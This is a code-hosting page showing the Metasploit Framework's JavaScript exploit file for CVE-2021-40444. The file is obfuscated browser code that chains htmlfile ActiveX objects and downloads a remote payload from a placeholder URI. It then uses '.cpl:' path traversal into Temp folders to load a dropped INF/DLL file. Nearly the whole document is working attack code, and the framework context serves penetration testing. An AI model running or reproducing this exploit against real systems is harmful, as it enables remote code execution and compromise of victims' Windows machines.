Sign upLogin

rapid7/metasploit-framework

View on GitHub
Star
data/exploits/CVE-2021-40444/cve_2021_40444.js

Summary

Maintainability
A
3 hrs
Test Coverage
function exploit() {
   var x = window["document"];
   var then = window["Document"]["prototype"]["createElement"];
   var _0x4d7c02 = window["Document"]["prototype"]["write"];
   var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
   var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
   var range = then["call"](x, "iframe");
   try {
     PL$22["call"](x["body"], range);
   } catch (errx) {
     PL$22["call"](x["documentElement"], range);
   }
   var ACTIVEX = range["contentWindow"]["ActiveXObject"];
   var view = new ACTIVEX("htmlfile");
   range["contentDocument"]["open"]()["close"]();

   try {
     opfilter["call"](x["body"], range);
   } catch (err) {
     opfilter["call"](x["documentElement"], range);
   }
   view["open"]()["close"]();
   var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
   mappedObj["open"]()["close"]();
   var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
   TokenType["open"]()["close"]();
   var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
   model["open"]()["close"]();
   var iedom = new ActiveXObject("htmlfile");
   var rp_test = new ActiveXObject("htmlfile");
   var wmp_test = new ActiveXObject("htmlfile");
   var doc = new ActiveXObject("htmlfile");
   var a = new ActiveXObject("htmlfile");
   var fake = new ActiveXObject("htmlfile");
   var errors = window["XMLHttpRequest"];
   var $node = new errors;
   var directiveProcessors = errors["prototype"]["open"];
   var nodeTypeRender = errors["prototype"]["send"];
   var newAttributes = window["setTimeout"];
   directiveProcessors["call"]($node, "GET", "REPLACE_URI", ![]);
   nodeTypeRender["call"]($node);
   model["Script"]["document"]["write"]("<body>");
   var PL$41 = then["call"](model["Script"]["document"], "object");
   PL$41["setAttribute"]("codebase", "REPLACE_URI#version=5,0,0,0");
   PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
   PL$22["call"](model["Script"]["document"]["body"], PL$41);
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/REPLACE_INF";
   rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/REPLACE_INF";
   wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/REPLACE_INF";
   a["Script"]["location"] = ".cpl:../../../../../Temp/Low/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../../../../Temp/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../Low/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../REPLACE_INF";
}
exploit();